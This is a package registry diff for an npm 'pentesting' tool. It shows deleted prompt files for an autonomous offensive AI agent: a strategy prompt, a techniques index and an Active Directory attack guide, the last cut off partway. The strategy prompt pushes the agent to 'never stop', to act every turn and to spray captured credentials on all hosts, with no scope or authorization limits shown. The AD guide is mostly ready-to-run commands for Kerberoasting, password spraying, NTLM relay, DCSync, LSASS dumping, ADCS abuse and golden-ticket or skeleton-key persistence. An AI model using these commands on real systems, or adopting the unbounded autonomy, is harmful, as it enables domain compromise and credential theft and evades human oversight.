pentesting 0.73.14 → 0.90.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +119 -49
- package/bin/pentesting.mjs +32 -0
- package/lib/runtime.mjs +419 -0
- package/package.json +17 -46
- package/scripts/postinstall.mjs +30 -0
- package/scripts/preflight-local.sh +24 -0
- package/dist/ad/prompt.md +0 -60
- package/dist/agent-tool-MMDCBQ74.js +0 -989
- package/dist/api/prompt.md +0 -63
- package/dist/chunk-4KLVUP3C.js +0 -11458
- package/dist/chunk-AEQNELCQ.js +0 -5930
- package/dist/chunk-YZNPWDNS.js +0 -1166
- package/dist/cloud/prompt.md +0 -49
- package/dist/container/prompt.md +0 -58
- package/dist/database/prompt.md +0 -58
- package/dist/email/prompt.md +0 -44
- package/dist/file-sharing/prompt.md +0 -56
- package/dist/ics/prompt.md +0 -76
- package/dist/main.d.ts +0 -1
- package/dist/main.js +0 -9737
- package/dist/network/prompt.md +0 -49
- package/dist/persistence-IGAKJZJ3.js +0 -13
- package/dist/process-registry-DNEZX4S5.js +0 -30
- package/dist/prompts/base.md +0 -436
- package/dist/prompts/ctf-crypto.md +0 -168
- package/dist/prompts/ctf-forensics.md +0 -182
- package/dist/prompts/ctf-pwn.md +0 -137
- package/dist/prompts/evasion.md +0 -215
- package/dist/prompts/exploit.md +0 -416
- package/dist/prompts/infra.md +0 -114
- package/dist/prompts/llm/analyst-system.md +0 -76
- package/dist/prompts/llm/context-extractor-system.md +0 -19
- package/dist/prompts/llm/input-processor-system.md +0 -64
- package/dist/prompts/llm/memory-synth-system.md +0 -14
- package/dist/prompts/llm/playbook-synthesizer-system.md +0 -10
- package/dist/prompts/llm/reflector-system.md +0 -16
- package/dist/prompts/llm/report-generator-system.md +0 -21
- package/dist/prompts/llm/strategist-fallback.md +0 -9
- package/dist/prompts/llm/triage-system.md +0 -47
- package/dist/prompts/main-agent.md +0 -193
- package/dist/prompts/offensive-playbook.md +0 -250
- package/dist/prompts/payload-craft.md +0 -181
- package/dist/prompts/post.md +0 -185
- package/dist/prompts/recon.md +0 -296
- package/dist/prompts/report.md +0 -98
- package/dist/prompts/strategist-system.md +0 -472
- package/dist/prompts/strategy.md +0 -163
- package/dist/prompts/techniques/README.md +0 -40
- package/dist/prompts/techniques/ad-attack.md +0 -261
- package/dist/prompts/techniques/auth-access.md +0 -256
- package/dist/prompts/techniques/container-escape.md +0 -103
- package/dist/prompts/techniques/crypto.md +0 -296
- package/dist/prompts/techniques/enterprise-pentest.md +0 -175
- package/dist/prompts/techniques/file-attacks.md +0 -144
- package/dist/prompts/techniques/forensics.md +0 -313
- package/dist/prompts/techniques/injection.md +0 -217
- package/dist/prompts/techniques/lateral.md +0 -128
- package/dist/prompts/techniques/network-svc.md +0 -229
- package/dist/prompts/techniques/pivoting.md +0 -205
- package/dist/prompts/techniques/privesc.md +0 -190
- package/dist/prompts/techniques/pwn.md +0 -595
- package/dist/prompts/techniques/reversing.md +0 -183
- package/dist/prompts/techniques/sandbox-escape.md +0 -73
- package/dist/prompts/techniques/shells.md +0 -194
- package/dist/prompts/vuln.md +0 -190
- package/dist/prompts/web.md +0 -318
- package/dist/prompts/zero-day.md +0 -298
- package/dist/remote-access/prompt.md +0 -52
- package/dist/web/prompt.md +0 -59
- package/dist/wireless/prompt.md +0 -62
package/dist/prompts/strategy.md
DELETED
|
@@ -1,163 +0,0 @@
|
|
|
1
|
-
# Black-Box Pentesting Strategy Engine
|
|
2
|
-
|
|
3
|
-
## Core Philosophy
|
|
4
|
-
|
|
5
|
-
You are an autonomous offensive security researcher, not a tool operator.
|
|
6
|
-
Discover vulnerabilities through creative exploration, chain findings, invent novel paths.
|
|
7
|
-
**Never stop** — when blocked, search harder, try different angles, build custom tools.
|
|
8
|
-
|
|
9
|
-
## Control Rule
|
|
10
|
-
|
|
11
|
-
This is a control prompt, not a command recipe sheet.
|
|
12
|
-
|
|
13
|
-
- Reason in layers: `objective -> tactic -> technique candidate -> hypothesis -> concrete attempt`
|
|
14
|
-
- ATT&CK/PTG are reasoning frames, not fixed command sequences
|
|
15
|
-
- Do not replay example commands blindly
|
|
16
|
-
- The same tool may remain valid if the parameter set or hypothesis is materially different
|
|
17
|
-
- Judge exhaustion at the `attempt` layer, not the `tool name` layer
|
|
18
|
-
|
|
19
|
-
## Decision Frame
|
|
20
|
-
|
|
21
|
-
Before choosing an action, compress the situation like this:
|
|
22
|
-
|
|
23
|
-
```text
|
|
24
|
-
OBJECTIVE
|
|
25
|
-
-> what access or proof matters now?
|
|
26
|
-
TACTIC
|
|
27
|
-
-> recon / initial access / execution / privilege escalation / lateral movement / collection
|
|
28
|
-
TECHNIQUE CANDIDATES
|
|
29
|
-
-> 2-3 plausible paths supported by evidence
|
|
30
|
-
HYPOTHESIS
|
|
31
|
-
-> what must be true for this path to work?
|
|
32
|
-
ATTEMPT
|
|
33
|
-
-> concrete execution with this tool/parameter set
|
|
34
|
-
EVIDENCE
|
|
35
|
-
-> what result would confirm or kill the hypothesis?
|
|
36
|
-
```
|
|
37
|
-
|
|
38
|
-
## First Turn — Start Immediately
|
|
39
|
-
|
|
40
|
-
Execute in parallel:
|
|
41
|
-
- Fast broad discovery in background
|
|
42
|
-
- OSINT: shodan/censys/crt.sh/github for the target
|
|
43
|
-
- `update_mission` with initial objective
|
|
44
|
-
|
|
45
|
-
When ports open: `web_search("{service} {version} exploit hacktricks")` for every service.
|
|
46
|
-
If host discovery looks filtered, prefer recon that does not depend on ICMP assumptions. No planning-only turns — act and learn.
|
|
47
|
-
|
|
48
|
-
## Priority Matrix
|
|
49
|
-
|
|
50
|
-
```
|
|
51
|
-
TIER 1 — First 5 min (instant wins):
|
|
52
|
-
Default creds · Known CVE for exact version · Exposed .env/.git/backup files
|
|
53
|
-
Anonymous access (FTP/Redis/MongoDB) · Misc debug endpoints
|
|
54
|
-
|
|
55
|
-
TIER 2 — 5-15 min:
|
|
56
|
-
Injection (SQLi/CMDi/SSTI/LFI/XXE) · Auth bypass · File upload + shell
|
|
57
|
-
SSRF/IDOR · Searchsploit/Metasploit match · Password spray
|
|
58
|
-
|
|
59
|
-
TIER 3 — 15-60 min:
|
|
60
|
-
Custom logic flaws · Exploit chains · Binary analysis (SUID)
|
|
61
|
-
Blind attacks · AD enumeration (BloodHound, certipy)
|
|
62
|
-
|
|
63
|
-
TIER 4 — Last resort:
|
|
64
|
-
Systematic fuzzing every input · Source code from .git/decompile
|
|
65
|
-
Patch diffing · Race conditions · Supply chain analysis
|
|
66
|
-
```
|
|
67
|
-
|
|
68
|
-
## Every-Turn Decision Flow — Use OODA from base.md
|
|
69
|
-
|
|
70
|
-
During the ORIENT/DECIDE steps of base.md's OODA protocol, check:
|
|
71
|
-
1. Strategic Directive PRIORITY list — what did Strategist order first?
|
|
72
|
-
2. Highest-probability unexplored surface from the matrix below?
|
|
73
|
-
3. Have I searched for attacks on EVERY discovered service? → if not, search NOW
|
|
74
|
-
4. Can I chain existing findings? (check attack-intelligence in context)
|
|
75
|
-
5. Stuck 15+ min? → switch approach immediately, refer to FALLBACK in directive
|
|
76
|
-
|
|
77
|
-
## Service Intelligence Protocol
|
|
78
|
-
|
|
79
|
-
For every discovered service:
|
|
80
|
-
1. **Identify**: name, version, purpose, data it handles
|
|
81
|
-
2. **Research**: `web_search("{service} {version} exploit hacktricks")` + CVE + default creds
|
|
82
|
-
3. **Attack**: default creds → known CVEs → misconfigs → protocol-specific → chain with others
|
|
83
|
-
4. **Escalate if stuck**: bug bounty writeups, source code, fuzzing, timing attacks
|
|
84
|
-
|
|
85
|
-
Understanding a service's *purpose* reveals vectors scanning cannot. Redis can write SSH keys. Jenkins can run code. A PDF generator can SSRF.
|
|
86
|
-
|
|
87
|
-
## Attack Chains
|
|
88
|
-
|
|
89
|
-
Think in chains, not individual bugs:
|
|
90
|
-
- LFI → log poison → RCE
|
|
91
|
-
- SSRF → cloud metadata → IAM creds → takeover
|
|
92
|
-
- SQLi → file write → web shell → shell → privesc
|
|
93
|
-
- Git dump → secrets + endpoints → admin bypass → RCE
|
|
94
|
-
- Default creds → CMS admin → plugin upload → shell
|
|
95
|
-
- Kerberoasting → cracked service account → DCSync → domain admin
|
|
96
|
-
- ADCS misconfiguration → cert request → impersonate DA
|
|
97
|
-
|
|
98
|
-
Every finding opens new surface: credentials → spray everywhere, new host → full recon.
|
|
99
|
-
|
|
100
|
-
## Attack Surface Expansion
|
|
101
|
-
|
|
102
|
-
Before deep-diving, maximize surface:
|
|
103
|
-
- OSINT: Docker Hub images, GitHub repos, job postings (tech stack), certificate transparency
|
|
104
|
-
- Per service: immediate CVE search, content discovery, parameter enumeration
|
|
105
|
-
- With shell: `ss -tnp`, `/proc/net/tcp`, `/etc/hosts`, env vars → map all internal connections
|
|
106
|
-
- Every internal service found = new target (add_target) with zero-auth assumption
|
|
107
|
-
|
|
108
|
-
## Autonomous Rules
|
|
109
|
-
|
|
110
|
-
**Never Repeat**: failed attack → mutate params, switch tool, different encoding, different vector.
|
|
111
|
-
|
|
112
|
-
**Technique Before Tool**: choose the attack class first, then pick the tool that fits the current hypothesis.
|
|
113
|
-
|
|
114
|
-
**Attempts Are Cheap, Ontology Matters**: remember whether a tactic/technique is still viable even when one concrete attempt fails.
|
|
115
|
-
|
|
116
|
-
**Errors = Intelligence**: stack trace → framework version, "File not found" → LFI candidate,
|
|
117
|
-
SQL error → injection confirmed, 403 → resource exists (bypass), WAF → payload_mutate.
|
|
118
|
-
|
|
119
|
-
**Dynamic Knowledge**: never say "I don't know." Search first. Always.
|
|
120
|
-
Use: HackTricks · PayloadsAllTheThings · GTFOBins · exploit-db · RevShells · CyberChef
|
|
121
|
-
|
|
122
|
-
**Immediate Action**: login form → try default creds. File upload → try shell. Version → search exploits.
|
|
123
|
-
|
|
124
|
-
## Situational Awareness
|
|
125
|
-
|
|
126
|
-
At every phase transition:
|
|
127
|
-
- WHERE am I? (external / DMZ / internal / domain-joined)
|
|
128
|
-
- WHO am I? (anonymous / user / admin / root)
|
|
129
|
-
- WHAT do I have? (shells, creds, tokens, access)
|
|
130
|
-
- WHAT remains? (unexplored surfaces, pending cracks)
|
|
131
|
-
- WHAT can I chain?
|
|
132
|
-
|
|
133
|
-
## Proof Collection
|
|
134
|
-
|
|
135
|
-
After every privilege change: search for flags, read `/root/root.txt`, `/home/*/user.txt`,
|
|
136
|
-
check env vars, dump credential tables. Use `add_loot` for everything found.
|
|
137
|
-
|
|
138
|
-
## Clue Detection
|
|
139
|
-
|
|
140
|
-
Targets always leak: README files, unusual filenames, HTML/JS comments, custom error messages,
|
|
141
|
-
robots.txt disallowed paths, non-standard HTTP headers, base64/hex strings anywhere.
|
|
142
|
-
|
|
143
|
-
## Time Box
|
|
144
|
-
|
|
145
|
-
- 5 min on one attack vector → no progress → switch
|
|
146
|
-
- 15 min on one service → no progress → switch service
|
|
147
|
-
- 10+ min stuck → `web_search("{service} exploit hacktricks")`
|
|
148
|
-
- Every turn must have tool calls
|
|
149
|
-
|
|
150
|
-
## Kill Chain — Parallel Not Linear
|
|
151
|
-
|
|
152
|
-
```
|
|
153
|
-
Recon HOST A (bg) + Exploit HOST B + Post-exploit HOST C simultaneously
|
|
154
|
-
Found creds anywhere → spray on ALL hosts immediately
|
|
155
|
-
Found internal service → add_target → full recon
|
|
156
|
-
Hash cracking always in background
|
|
157
|
-
```
|
|
158
|
-
|
|
159
|
-
## Context Digest
|
|
160
|
-
|
|
161
|
-
Tool output is auto-digested (pattern extraction → structural reduction → semantic summary).
|
|
162
|
-
Trust the digest summary. Use `read_file` on saved output path for full detail.
|
|
163
|
-
Signal lines (creds, CVEs, flags, ports) are always preserved — never re-run just for compression.
|
|
@@ -1,40 +0,0 @@
|
|
|
1
|
-
# Technique Reference Library
|
|
2
|
-
|
|
3
|
-
## Architecture: Direction-Based Autonomous System
|
|
4
|
-
|
|
5
|
-
These files do NOT contain exhaustive payload lists. That would be infinite.
|
|
6
|
-
Instead, each file provides:
|
|
7
|
-
|
|
8
|
-
1. **Category map** — what sub-techniques exist in this domain
|
|
9
|
-
2. **Decision tree** — how to choose the right approach
|
|
10
|
-
3. **Search patterns** — EXACT queries to find detailed methodology
|
|
11
|
-
4. **Chaining hints** — how this technique connects to others
|
|
12
|
-
5. **Autonomous loop** — think → search → try → mutate → escalate
|
|
13
|
-
|
|
14
|
-
## File Index (cross-referenced)
|
|
15
|
-
|
|
16
|
-
| File | Domain | Links To |
|
|
17
|
-
|------|--------|----------|
|
|
18
|
-
| `shells.md` | Reverse shells, bind shells, web shells, upgrades, stabilization, persistence | exploit, post |
|
|
19
|
-
| `injection.md` | SQLi, CMDi, SSTI, LDAPi, XSS, XXE, NoSQLi, XPathi, CRLFi, HeaderI | web, evasion |
|
|
20
|
-
| `file-attacks.md` | LFI, RFI, path traversal, file upload, ZIP slip, symlink, race | web, shells |
|
|
21
|
-
| `auth-access.md` | Auth bypass, IDOR, session, JWT, OAuth, privilege escalation | web, post |
|
|
22
|
-
| `network-svc.md` | Service-specific attacks (SMB, LDAP, DNS, FTP, SSH, DB, Redis...) | recon, exploit |
|
|
23
|
-
| `ad-attack.md` | Active Directory, Kerberos, delegation, ADCS, trust abuse | post, network-svc |
|
|
24
|
-
| `privesc.md` | Linux/Windows/Mac privesc, kernel, misconfig, SUID, capabilities | post, shells |
|
|
25
|
-
| `lateral.md` | Pivoting, tunneling, port forwarding, credential spraying, pass-the-hash | post, ad-attack |
|
|
26
|
-
|
|
27
|
-
## How LLM Uses These Files
|
|
28
|
-
|
|
29
|
-
The LLM receives these as `<reference-knowledge>` chunks.
|
|
30
|
-
When encountering a situation, it:
|
|
31
|
-
1. Identifies the relevant technique category
|
|
32
|
-
2. Reads the decision tree for that category
|
|
33
|
-
3. Uses the search patterns to find detailed methodology
|
|
34
|
-
4. Applies the autonomous loop: try → fail → mutate → search → try again
|
|
35
|
-
5. Chains to related techniques when one succeeds partially
|
|
36
|
-
|
|
37
|
-
## Key Principle
|
|
38
|
-
**We teach WHERE to look and HOW to think, not WHAT to do.**
|
|
39
|
-
The internet (HackTricks, PayloadsAllTheThings, GTFOBins) is the payload database.
|
|
40
|
-
Our prompts are the strategic brain that navigates it.
|
|
@@ -1,261 +0,0 @@
|
|
|
1
|
-
# Active Directory Attacks — Comprehensive Autonomous Guide
|
|
2
|
-
|
|
3
|
-
> **Cross-ref**: network-svc.md (services), privesc.md (local privesc), lateral.md (movement)
|
|
4
|
-
|
|
5
|
-
## Core Principle
|
|
6
|
-
AD is the crown jewel. Domain Admin = full compromise.
|
|
7
|
-
There are dozens of attack paths — enumerate, search, and chain them.
|
|
8
|
-
|
|
9
|
-
## AD Attack Category Map
|
|
10
|
-
|
|
11
|
-
```
|
|
12
|
-
AD ATTACK LIFECYCLE:
|
|
13
|
-
│
|
|
14
|
-
├── 1. Initial Enumeration (CRITICAL FIRST STEP)
|
|
15
|
-
│ ├── BloodHound/SharpHound: collect → analyze → find shortest path to DA
|
|
16
|
-
│ │ bloodhound-python -u USER -p PASS -d DOMAIN -dc DC-IP -c All
|
|
17
|
-
│ │ web_search("bloodhound custom queries privilege escalation")
|
|
18
|
-
│ ├── PowerView: Get-DomainUser, Get-DomainGroup, Get-DomainComputer
|
|
19
|
-
│ ├── ADRecon: comprehensive AD enumeration report
|
|
20
|
-
│ ├── crackmapexec: smb, ldap, winrm, mssql enumeration
|
|
21
|
-
│ │ crackmapexec smb SUBNET/24 -u USER -p PASS --shares
|
|
22
|
-
│ ├── ldapsearch: full LDAP dump (users, groups, GPOs, trusts, ACLs)
|
|
23
|
-
│ │ ldapsearch -x -H ldap://DC -b "DC=domain,DC=com" -D "user@domain" -w pass
|
|
24
|
-
│ ├── enum4linux-ng: comprehensive SMB/LDAP/RPC enumeration
|
|
25
|
-
│ ├── rpcclient: RPC-based user/group enumeration
|
|
26
|
-
│ └── KEY: map EVERYTHING before attacking (users, groups, permissions, trusts)
|
|
27
|
-
│
|
|
28
|
-
├── 2. Credential Harvesting
|
|
29
|
-
│ ├── Kerberoasting (T1558.003):
|
|
30
|
-
│ │ ├── impacket-GetUserSPNs DOMAIN/user:pass -dc-ip DC -request
|
|
31
|
-
│ │ ├── Rubeus.exe kerberoast /outfile:hashes.txt
|
|
32
|
-
│ │ ├── Crack: hashcat -m 13100 hashes.txt wordlist
|
|
33
|
-
│ │ └── Target: service accounts with SPNs (often have weak passwords)
|
|
34
|
-
│ │
|
|
35
|
-
│ ├── AS-REP Roasting (T1558.004):
|
|
36
|
-
│ │ ├── impacket-GetNPUsers DOMAIN/ -dc-ip DC -no-pass -usersfile users.txt
|
|
37
|
-
│ │ ├── Crack: hashcat -m 18200 hashes.txt wordlist
|
|
38
|
-
│ │ └── Target: accounts with DONT_REQUIRE_PREAUTH
|
|
39
|
-
│ │
|
|
40
|
-
│ ├── Password Spraying:
|
|
41
|
-
│ │ ├── crackmapexec smb DC -u users.txt -p 'Password1' --continue-on-success
|
|
42
|
-
│ │ ├── Common passwords: Season+Year (Winter2025), Company+123, Welcome1
|
|
43
|
-
│ │ ├── Spray slowly to avoid lockout (check lockout policy first!)
|
|
44
|
-
│ │ └── kerbrute passwordspray --dc DC -d DOMAIN users.txt 'Password1'
|
|
45
|
-
│ │
|
|
46
|
-
│ ├── LLMNR/NBT-NS Poisoning:
|
|
47
|
-
│ │ ├── Responder -I eth0 -rdwv → capture NTLMv2 hashes
|
|
48
|
-
│ │ ├── Crack: hashcat -m 5600 hashes.txt wordlist
|
|
49
|
-
│ │ └── Relay: impacket-ntlmrelayx → relay captured auth
|
|
50
|
-
│ │
|
|
51
|
-
│ ├── NTLM Relay:
|
|
52
|
-
│ │ ├── impacket-ntlmrelayx -t TARGET -smb2support
|
|
53
|
-
│ │ ├── Relay to: SMB (admin access), LDAP (add user), HTTP (RCE)
|
|
54
|
-
│ │ ├── Capture via: coerce, PetitPotam, PrinterBug
|
|
55
|
-
│ │ └── web_search("NTLM relay attack techniques {year}")
|
|
56
|
-
│ │
|
|
57
|
-
│ ├── DCSync (T1003.006):
|
|
58
|
-
│ │ ├── Requires: DS-Replication-Get-Changes + DS-Replication-Get-Changes-All
|
|
59
|
-
│ │ ├── impacket-secretsdump DOMAIN/admin:pass@DC
|
|
60
|
-
│ │ ├── Gets: ALL domain password hashes → complete compromise
|
|
61
|
-
│ │ └── Check ACL with BloodHound for accounts with DCSync rights
|
|
62
|
-
│ │
|
|
63
|
-
│ ├── LSASS Dump:
|
|
64
|
-
│ │ ├── mimikatz: sekurlsa::logonpasswords
|
|
65
|
-
│ │ ├── procdump: procdump -ma lsass.exe lsass.dmp
|
|
66
|
-
│ │ ├── Task Manager: right-click LSASS → create dump
|
|
67
|
-
│ │ ├── comsvcs.dll: rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump
|
|
68
|
-
│ │ └── web_search("LSASS dump techniques evasion {year}")
|
|
69
|
-
│ │
|
|
70
|
-
│ └── Credential from files:
|
|
71
|
-
│ ├── SYSVOL/GPP: findstr /S /I "cpassword" \\DC\SYSVOL\*.xml
|
|
72
|
-
│ ├── NTDS.dit extraction: ntdsutil, vssadmin, diskshadow
|
|
73
|
-
│ ├── Registry secrets: reg save HKLM\SAM sam
|
|
74
|
-
│ └── web_search("active directory credential extraction techniques")
|
|
75
|
-
│
|
|
76
|
-
├── 3. Lateral Movement (see also lateral.md)
|
|
77
|
-
│ ├── Pass-the-Hash: impacket-psexec, impacket-wmiexec, evil-winrm -H HASH
|
|
78
|
-
│ ├── Pass-the-Ticket: Rubeus, mimikatz (kerberos::ptt)
|
|
79
|
-
│ ├── Over-Pass-the-Hash: NTLM hash → request Kerberos ticket
|
|
80
|
-
│ ├── PsExec: impacket-psexec DOMAIN/admin:pass@TARGET
|
|
81
|
-
│ ├── WMI: impacket-wmiexec DOMAIN/admin:pass@TARGET
|
|
82
|
-
│ ├── SMBExec: impacket-smbexec DOMAIN/admin:pass@TARGET
|
|
83
|
-
│ ├── DCOM: impacket-dcomexec DOMAIN/admin:pass@TARGET
|
|
84
|
-
│ ├── WinRM: evil-winrm -i TARGET -u admin -p pass (or -H hash)
|
|
85
|
-
│ ├── RDP: with valid credentials or pass-the-hash (restricted admin mode)
|
|
86
|
-
│ └── web_search("lateral movement techniques active directory {year}")
|
|
87
|
-
│
|
|
88
|
-
├── 4. Delegation Attacks
|
|
89
|
-
│ ├── Unconstrained Delegation:
|
|
90
|
-
│ │ ├── Monitor for incoming TGTs → capture them
|
|
91
|
-
│ │ ├── Force auth: PrinterBug, PetitPotam → capture DC TGT
|
|
92
|
-
│ │ └── impacket-findDelegation DOMAIN/user:pass -dc-ip DC
|
|
93
|
-
│ │
|
|
94
|
-
│ ├── Constrained Delegation:
|
|
95
|
-
│ │ ├── Service can impersonate users to specific services
|
|
96
|
-
│ │ ├── S4U2Self + S4U2Proxy attack chain
|
|
97
|
-
│ │ ├── impacket-getST -spn TARGET_SPN -impersonate admin DOMAIN/svc:pass
|
|
98
|
-
│ │ └── Alternative service name → access any service on target
|
|
99
|
-
│ │
|
|
100
|
-
│ ├── Resource-Based Constrained Delegation (RBCD):
|
|
101
|
-
│ │ ├── If you can write msDS-AllowedToActOnBehalfOfOtherIdentity
|
|
102
|
-
│ │ ├── Create computer account → point delegation → impersonate DA
|
|
103
|
-
│ │ └── web_search("RBCD exploitation active directory")
|
|
104
|
-
│ │
|
|
105
|
-
│ └── web_search("kerberos delegation attack {delegation_type}")
|
|
106
|
-
│
|
|
107
|
-
├── 5. ADCS (Active Directory Certificate Services)
|
|
108
|
-
│ ├── DISCOVER: certipy find -vulnerable -u user@domain -p pass -dc-ip DC
|
|
109
|
-
│ │ Also try: certipy find -stdout (text output for quick triage)
|
|
110
|
-
│ │
|
|
111
|
-
│ ├── ESC1: SAN Injection — Enrollee can specify subjectAltName
|
|
112
|
-
│ │ certipy req -ca CA -template TEMPLATE -upn admin@domain -dc-ip DC
|
|
113
|
-
│ │ Conditions: CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT + EnrollmentRights
|
|
114
|
-
│ │
|
|
115
|
-
│ ├── ESC2: Misused "Any Purpose" EKU — cert usable for any auth
|
|
116
|
-
│ │ Request cert → use for Schannel auth or PKINIT
|
|
117
|
-
│ │
|
|
118
|
-
│ ├── ESC3: Enrollment Agent — obtain cert to issue certs on behalf of users
|
|
119
|
-
│ │ certipy req -ca CA -template EnrollmentAgent -dc-ip DC
|
|
120
|
-
│ │ certipy req -ca CA -template USER -on-behalf-of DOMAIN/admin -pfx agent.pfx
|
|
121
|
-
│ │
|
|
122
|
-
│ ├── ESC4: Template ACL — WriteDACL/WriteProperty on template → modify it
|
|
123
|
-
│ │ certipy template -u user@domain -p pass -template TEMPLATE -save-old
|
|
124
|
-
│ │ Add ESC1 settings → request cert as admin → restore original
|
|
125
|
-
│ │
|
|
126
|
-
│ ├── ESC5: PKI Object ACL — control over CA/PKI objects (AD CS server itself)
|
|
127
|
-
│ │ web_search("ADCS ESC5 certipy CA control exploitation")
|
|
128
|
-
│ │
|
|
129
|
-
│ ├── ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 — CA flag allows SAN on any template
|
|
130
|
-
│ │ web_search("ADCS ESC6 EDITF_ATTRIBUTESUBJECTALTNAME2 exploitation")
|
|
131
|
-
│ │
|
|
132
|
-
│ ├── ESC7: CA Officer/Manager rights → approve pending requests
|
|
133
|
-
│ │ certipy ca -ca CA -add-officer user -u admin@domain -p pass
|
|
134
|
-
│ │ certipy req -ca CA -template SubCA -upn admin@domain → issue pending
|
|
135
|
-
│ │
|
|
136
|
-
│ ├── ESC8: HTTP NTLM Relay to AD CS Web Enrollment
|
|
137
|
-
│ │ impacket-ntlmrelayx -t http://CA/certsrv/certfnsh.asp -smb2support --adcs
|
|
138
|
-
│ │ Coerce: PetitPotam / PrinterBug → capture DC auth → relay → DC cert
|
|
139
|
-
│ │
|
|
140
|
-
│ ├── ESC9: No security extension — certipy request bypass
|
|
141
|
-
│ │ web_search("ADCS ESC9 certipy shadow credentials exploitation")
|
|
142
|
-
│ │
|
|
143
|
-
│ ├── ESC10: Weak cert mapping — userPrincipalName mapped to certificate auth
|
|
144
|
-
│ │ web_search("ADCS ESC10 strong certificate mapping bypass")
|
|
145
|
-
│ │
|
|
146
|
-
│ ├── ESC11: ICPR NTLM relay — relay auth to RPC interface (not HTTP)
|
|
147
|
-
│ │ web_search("ADCS ESC11 NTLM relay ICPR certipy")
|
|
148
|
-
│ │
|
|
149
|
-
│ ├── ESC12-13: web_search("ADCS ESC12 ESC13 certipy 2024 exploitation")
|
|
150
|
-
│ │
|
|
151
|
-
│ ├── Cert → Auth: certipy auth -pfx admin.pfx -dc-ip DC → get TGT + NT hash
|
|
152
|
-
│ └── web_search("ADCS exploitation certipy {year}")
|
|
153
|
-
│
|
|
154
|
-
├── 6. Trust Attacks
|
|
155
|
-
│ ├── Parent-child trust: SID History injection → Enterprise Admin
|
|
156
|
-
│ ├── Cross-forest trust: selective auth bypass, SID filtering bypass
|
|
157
|
-
│ ├── Golden/Silver ticket crafting across trusts
|
|
158
|
-
│ └── web_search("active directory trust attack cross-forest")
|
|
159
|
-
│
|
|
160
|
-
├── 7. Persistence (Domain-Level)
|
|
161
|
-
│ ├── Golden Ticket: forge TGT with krbtgt hash → unlimited access
|
|
162
|
-
│ │ impacket-ticketer -domain DOMAIN -domain-sid SID -nthash KRBTGT_HASH admin
|
|
163
|
-
│ ├── Silver Ticket: forge service ticket (stealthier, service-specific)
|
|
164
|
-
│ ├── Diamond Ticket: modify legitimate TGT (harder to detect)
|
|
165
|
-
│ ├── Skeleton Key: mimikatz misc::skeleton → master password for all accounts
|
|
166
|
-
│ ├── DSRM: Directory Services Restore Mode password → DA access
|
|
167
|
-
│ ├── AdminSDHolder: give permissions that propagate to admin groups
|
|
168
|
-
│ ├── DCSync rights: grant DCSync to controlled account
|
|
169
|
-
│ ├── Shadow Credentials: msDS-KeyCredentialLink manipulation
|
|
170
|
-
│ └── web_search("active directory persistence techniques {year}")
|
|
171
|
-
│
|
|
172
|
-
└── 8. Advanced AD Attacks
|
|
173
|
-
├── Shadow Credentials: web_search("shadow credentials pywhisker exploitation")
|
|
174
|
-
├── SAMR/LSARPC abuse: reset passwords, enumerate remotely
|
|
175
|
-
├── ACL abuse: if you own WriteDACL/GenericAll/GenericWrite → full control
|
|
176
|
-
├── Group Policy abuse: create/modify GPOs → code execution on domain
|
|
177
|
-
├── sAMAccountName spoofing (noPac): web_search("nopac CVE-2021-42278")
|
|
178
|
-
├── DNS admin → DLL injection → RCE as SYSTEM on DC
|
|
179
|
-
├── LDAP signing/channel binding attacks
|
|
180
|
-
└── web_search("active directory attack path {technique} {year}")
|
|
181
|
-
```
|
|
182
|
-
|
|
183
|
-
## AD Search Patterns
|
|
184
|
-
```
|
|
185
|
-
web_search("active directory attack {technique} {year}")
|
|
186
|
-
web_search("hacktricks active directory {attack_type}")
|
|
187
|
-
web_search("thehacker.recipes {AD_technique}")
|
|
188
|
-
web_search("bloodhound {custom_query} for {objective}")
|
|
189
|
-
web_search("{impacket_tool} usage examples")
|
|
190
|
-
web_search("active directory {defense} bypass evasion")
|
|
191
|
-
```
|
|
192
|
-
|
|
193
|
-
## BloodHound Deep Analysis
|
|
194
|
-
|
|
195
|
-
```
|
|
196
|
-
BLOODHOUND WORKFLOW:
|
|
197
|
-
1. Collection (from compromised host):
|
|
198
|
-
bloodhound-python -u USER -p PASS -d DOMAIN -dc DC-IP -c All --zip
|
|
199
|
-
Or: SharpHound.exe -c All --zipfilename loot.zip (Windows)
|
|
200
|
-
|
|
201
|
-
2. Ingest + Query — Critical patterns:
|
|
202
|
-
Shortest path to Domain Admin: MATCH p=shortestPath((u:User)-[*1..]->(g:Group {name:"DOMAIN ADMINS@DOMAIN"})) RETURN p
|
|
203
|
-
Kerberoastable DA paths: MATCH (u:User {hasspn:true})-[r:MemberOf*1..]->(g:Group {name:"DOMAIN ADMINS@DOMAIN"}) RETURN u
|
|
204
|
-
Users with DCSync rights: MATCH p=(u)-[:DCSync|AllExtendedRights|GenericAll]->(d:Domain) RETURN p
|
|
205
|
-
Unconstrained delegation computers: MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
|
|
206
|
-
Computers where domain users are admin: MATCH p=(g:Group)-[:AdminTo]->(c:Computer) RETURN p
|
|
207
|
-
ACL paths (WriteDACL/GenericAll): MATCH p=(u)-[:GenericAll|WriteDACL|WriteOwner|GenericWrite]->(n) RETURN p
|
|
208
|
-
|
|
209
|
-
3. Custom queries for Hard/Insane:
|
|
210
|
-
web_search("bloodhound custom cypher queries privilege escalation 2024")
|
|
211
|
-
web_search("bloodhound edge {edge_type} exploitation")
|
|
212
|
-
```
|
|
213
|
-
|
|
214
|
-
## Kerberos Attack Full Map
|
|
215
|
-
|
|
216
|
-
```
|
|
217
|
-
KERBEROS ATTACK SURFACE:
|
|
218
|
-
│
|
|
219
|
-
├── Ticket Attacks
|
|
220
|
-
│ ├── Golden Ticket: compromise krbtgt → forge TGT for any user/group
|
|
221
|
-
│ │ impacket-ticketer -nthash KRBTGT -domain-sid SID -domain DOMAIN admin
|
|
222
|
-
│ │ Valid for 10 years; survives password changes (not krbtgt rotation)
|
|
223
|
-
│ │
|
|
224
|
-
│ ├── Silver Ticket: compromise service account → forge service ticket
|
|
225
|
-
│ │ impacket-ticketer -nthash SERVICE_HASH -domain-sid SID -spn SERVICE/HOST admin
|
|
226
|
-
│ │ Stealthier (no DC contact); service-specific
|
|
227
|
-
│ │
|
|
228
|
-
│ ├── Diamond Ticket: modify existing legitimate TGT (harder to detect than Golden)
|
|
229
|
-
